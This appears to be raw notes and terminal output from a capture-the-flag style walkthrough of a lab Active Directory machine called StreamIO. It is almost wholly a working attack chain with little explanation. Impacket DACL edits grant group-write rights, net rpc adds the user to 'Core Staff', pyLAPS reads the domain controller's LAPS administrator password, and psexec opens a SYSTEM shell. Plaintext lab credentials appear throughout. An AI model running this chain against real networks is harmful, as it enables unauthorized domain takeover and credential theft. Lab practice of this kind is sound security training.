Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Current owner information below
[*] - SID: S-1-5-21-1470860369-1569627196-4264678630-1104
[*] - sAMAccountName: JDgodd
[*] - distinguishedName: CN=JDgodd,CN=Users,DC=streamIO,DC=htb
[*] OwnerSid modified successfully!

ldapdomaindump -u 'STREAMIO\JDgodd' -p 'JDg0dd1s@d0p3cr3@t0r' -d STREAMIO.HTB -dc-ip 10.10.11.158
grep -i 'Core Staff' domain_groups.json
"CORE STAFF"
"CN=CORE STAFF,CN=Users,DC=streamIO,DC=htb"
"CORE STAFF"
"CORE STAFF"
"dn": "CN=CORE STAFF,CN=Users,DC=streamIO,DC=htb"

dacledit.py -action write -rights WriteMembers -principal 'JDgodd' -target-dn 'CN=CORE STAFF,CN=Users,DC=streamIO,DC=htb' STREAMIO/JDgodd:JDg0dd1s@d0p3cr3@t0r -dc-ip 10.10.11.158
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20250201-232747.bak
[*] DACL modified successfully!

net rpc group addmem "Core Staff" "JDgodd" -U "streamio.htb"/"JDgodd"%"JDg0dd1s@d0p3cr3@t0r" -S "10.10.11.158"
- verify
JDgodd was added to the group Core Staff
net rpc group members "Core Staff" -U "streamio.htb"/"JDgodd"%"JDg0dd1s@d0p3cr3@t0r" -S "10.10.11.158"
streamIO\JDgodd

ReadLAPSPassword
pyLAPS.py --action get -d "STREAMIO" -u "JDgodd" -p "JDg0dd1s@d0p3cr3@t0r"
python3 pyLAPS.py --action get -d "STREAMIO" -u "JDgodd" -p "JDg0dd1s@d0p3cr3@t0r" --dc-ip 10.10.11.158
__ ___ ____ _____
____ __ __/ / / | / __ \/ ___/
/ __ \/ / / / / / /| | / /_/ /\__ \
/ /_/ / /_/ / /___/ ___ |/ ____/___/ /
/ .___/\__, /_____/_/ |_/_/ /____/ v1.2
/_/ /____/ @podalirius_
[+] Extracting LAPS passwords of all computers ...
| DC$ : AQN7xLM84$KH8a
[+] All done

creds
administrator:AQN7xLM84$KH8a
nxc smb 10.10.11.158 -u 'administrator' -p 'AQN7xLM84$KH8a'
SMB 10.10.11.158 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.158 445 DC [+] streamIO.htb\administrator:AQN7xLM84$KH8a (Pwn3d!)

impacket-psexec streamio/Administrator:'AQN7xLM84$KH8a'@10.10.11.158
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.10.11.158.....
[*] Found writable share ADMIN$
[*] Uploading file HRVHtNMW.exe
[*] Opening SVCManager on 10.10.11.158.....
[*] Creating service Xgba on 10.10.11.158.....
[*] Starting service Xgba.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2928]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system

root.txt
C:\Users\Martin\Desktop> type root.txt
d548755e...